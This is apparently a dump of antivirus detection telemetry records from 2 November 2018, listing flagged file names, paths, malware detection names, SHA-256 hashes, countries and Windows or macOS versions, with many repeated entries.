  Row(detection=Row(filename='konvert245.exe', filepath='\\\\192.168.2.4\\daten\\LC2\\lc\\buf\\lctop2.45-02.04.14\\konvert245.exe', filesize=18560000, name='W32/Infector.Gen9.#M300.#R800021'), hash='09ee66de9f790357add011e76d2bebeded29b34233ad558946816266334a5cda', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:9RDTQEcFJ0Kb0csk.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T07:04:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:39:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-174528-9ef519c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-174528-9EF519C7', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:45:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134353-9330510d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134353-9330510D', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4ccaa4375c978fa1f8bc6a651205398ca0801c04fcb88498e0e05ef149807010', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\4CCAA4375C978FA1F8BC6A651205398CA0801C04FCB88498E0E05EF149807010', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4ccaa4375c978fa1f8bc6a651205398ca0801c04fcb88498e0e05ef149807010', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:14:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051535-4c9d5874', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051535-4C9D5874', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soqvbuzh.exe', filepath='F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\SOQvbuZH.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UsbFix\\UsbFix.exe', parentsize=1999504, timestamp='2018-11-02T16:03:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered notel', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered notel', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='66bf5e284a4da1edd06c0642be2278a0cafe63675b99bd29a587703cb431e6d7', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:43:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-142340-ba2de021', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-142340-BA2DE021', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061456-973fbe24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061456-973FBE24', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-142358-bd9f2d69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-142358-BD9F2D69', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='d3dx9.dll', filepath='C:\\Users\\X\\Desktop\\Vape Cracked 2.47\\1.7.10\\d3dx9.dll', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:39:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132910-5aa5e4e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-132910-5AA5E4E5', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:32:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061455-9697c97d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061455-9697C97D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='airportn.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\airportN\\airportN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001e89', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001e89', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:46:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055242-7c13ae3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055242-7C13AE3D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T05:32:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054624-9a56a9c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054624-9A56A9C9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T11:34:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052827-187507ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052827-187507EA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134747-2a4a9c85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-134747-2A4A9C85', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:50:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='untb27f.tmp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\UB211.tmp\\UNTB27F.tmp.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='4a4740ecc4b6a3fd9936ab1cc2820d2829f30129f73902dab8c55be28577ab5f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:54:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062306-bb049850', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062306-BB049850', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gxwrlshl.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\GxwRlsHL.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052226-413b0247', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052226-413B0247', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T13:27:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060522-40c6039c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060522-40C6039C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060414-18616ae3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060414-18616AE3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053059-730a3c65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053059-730A3C65', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053053-6f6c151a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053053-6F6C151A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061733-f491b2dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061733-F491B2DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062515-081ada0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062515-081ADA0D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054049-d3027c05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054049-D3027C05', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053430-f0df0dc9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053430-F0DF0DC9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053645-4195ec4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053645-4195EC4C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054912-ff06fef0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054912-FF06FEF0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060452-2eee6ca3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060452-2EEE6CA3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051311-f6b18687', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051311-F6B18687', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060513-3b752042', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060513-3B752042', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051304-f25dd527', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051304-F25DD527', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052736-fa25e1c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052736-FA25E1C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054706-b3db860d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054706-B3DB860D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051630-6d2dc595', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051630-6D2DC595', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050831-4ffce92a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050831-4FFCE92A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053027-60751d58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053027-60751D58', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061956-49b3b3a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061956-49B3B3A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051827-b304cf78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051827-B304CF78', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:26Z'), dt=datetime.date(2018, 11, 2)),
